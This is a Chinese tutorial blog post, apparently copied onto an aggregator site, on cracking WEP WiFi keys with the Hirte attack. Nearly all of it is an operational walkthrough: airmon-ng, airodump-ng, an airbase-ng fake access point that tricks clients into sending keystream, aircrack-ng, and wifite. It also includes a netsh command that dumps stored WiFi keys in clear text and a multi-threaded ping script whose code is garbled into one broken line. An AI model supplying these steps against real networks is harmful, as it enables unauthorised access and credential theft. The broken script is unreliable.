当前位置: 首页 > news >正文

无线WiFi安全渗透与攻防(八)之WEP-Hirte渗透WEP加密

WEP-渗透WEP新思路–Hirte

1.Hirte介绍

Hirte是破解无线网络WEP Key的一种攻击类型

只要客户端设备(笔记本电脑,手机等)连接过的无线网络,那些WIFI即使是不在攻击者范围内也都能被破解,因为该wifi的WEP密钥和配置文件仍然存储在这些无线设备中。

netsh wlan show profile name="cisco-432F" key=clear

在这里插入图片描述

实施这种攻击的要求是建立一个和WEP网络相同的SSID假冒接入点。当客户端设备尝试自动连接到无线网络设时,假冒接入点(攻击者机器)会对受害者设备进行ARP攻击,导致受害者设备将包含密钥流的数据包发出。

2.Hirte破解原理

1.安装一个假的WEP AP(wifi名,mac地址要相同)并等待客户端连接

2.客户端的连接等待自动分配IP地址

3.客户端发送一个ARP数据包

4.获得了ARP分组,并且将其转换成一个ARP请求为同一客户机

5.客户回复

6.收集这些数据包

7.破解WEP密钥

3.渗透姿势1

1.查看网卡信息

ip a

在这里插入图片描述

2.监听网卡

airmon-ng start wlan0

在这里插入图片描述

3.扫描附近的wifi

airodump-ng wlan0mon

在这里插入图片描述

4.配置airodump-ng捕捉数据包并保存数据包文件名字为HSEK

airodump-ng wlan0mon --bssid D8:24:BD:79:18:0B --write HSEK
--bssid:AP的mac地址
--write:保存文件

在这里插入图片描述

命令执行后,会在当前目录下生成五个文件
在这里插入图片描述

5.开始伪造AP,用airbase-ng工具建立WEP接入点

airbase-ng -c 1 -a  D8:24:BD:79:18:0B --essid "cisco-1809" -W 1 -N wlan0mon
-c:信道
-a:模拟AP的MAC地址
--essid:wifi的名称
-W:设置加密位
-N:使Hirte攻击模式
wlan0mon:是接口

在这里插入图片描述
在这里插入图片描述

6.只要有客户端一连上来,就会自动进行攻击

在这里插入图片描述

在这里插入图片描述

7.启动aircrack-ng从捕获的数据包:Hirte破解WEP密钥

aircrack-ng HSEK-01.cap

在这里插入图片描述

破解密码是有要求的,第一次ivs必须要大于5000,当小于这个数的话,就会提示

在这里插入图片描述
在这里插入图片描述

4.渗透姿势2

1.扫描并指定破解方式

wifite  -wep -hirte

在这里插入图片描述

选择要破解的NUM

在这里插入图片描述

2.加速ivs收集

ping -t 192.168.1.1 //路由器的地址

3.开启攻击脚本加快ivs收集

python cmd.py

将下列代码保存为cmd.py 注意192.168.1.1这里填写你的路由器地址,我的是这个,你们的可能会有不同

import os
import threading
import timeclass myThread (threading.Thread):def __init__(self):threading.Thread.__init__(self)def run(self):cmd="ping /t 192.168.1.1"os.system(cmd)time.sleep(0.1)threads=[]for i in range(180):thread1 = myThread()thread1.start()threads.append(thread1)for item in threads:item.join()print ("退出主线程")

在这里插入图片描述

4.当ivs样本达到10000以后,成功获得密钥

在这里插入图片描述

http://www.lryc.cn/news/40004.html

相关文章:

  • 前端常考面试题整理
  • 二十二、身份验证与权限
  • k8s pod 升级与回滚
  • 【Go】Go语言开发环境安装
  • el-switch使用
  • 【算法入门】字符串基础
  • 前端面试题 —— 浏览器原理(二)
  • 对于植物神经紊乱的治疗 中医采用辩证论治的方法
  • chatGPT之Python API启用上下文管理
  • 油田钻井实时在线监测系统
  • 经典PID控制算法原理以及优化思路
  • 经典面试题之赋值和深浅拷贝的区别
  • 电子取证的电脑配置有关问题,以我仅有的知识为大家建议一下。
  • 【基础算法】单链表的OJ练习(5) # 环形链表 # 环形链表II # 对环形链表II的解法给出证明(面试常问到)
  • MySQL 基础教程[13]
  • 个人练习-Leetcode-826. Most Profit Assigning Work
  • 云原生周刊:边缘计算会吞噬云吗?| 2023.3.13
  • python+django+vue图书个性化推荐系统
  • 经典文献阅读之--LIO-PPF(增量平面预拟合LIO)
  • ChatGPT背后有哪些关键技术?CSIG企业行带你一探究竟
  • C#基础之面向对象编程(二)
  • 蓝桥杯刷题冲刺 | 倒计时25天
  • c语言—动态内存管理
  • 请说明Ajax、Fetch、Axios三者的区别
  • 阿里p8测试总监,让我们用这份《测试用例规范》,再也没加班过
  • 【Unity】数据持久化路径Application.persistentDataPath
  • 华为OD机试 - 插队(Java JS Python)
  • MongoDB数据库从入门到精通系列之八:调整oplog大小
  • PCL 间接平差法拟合二维直线
  • 进程调度的基本过程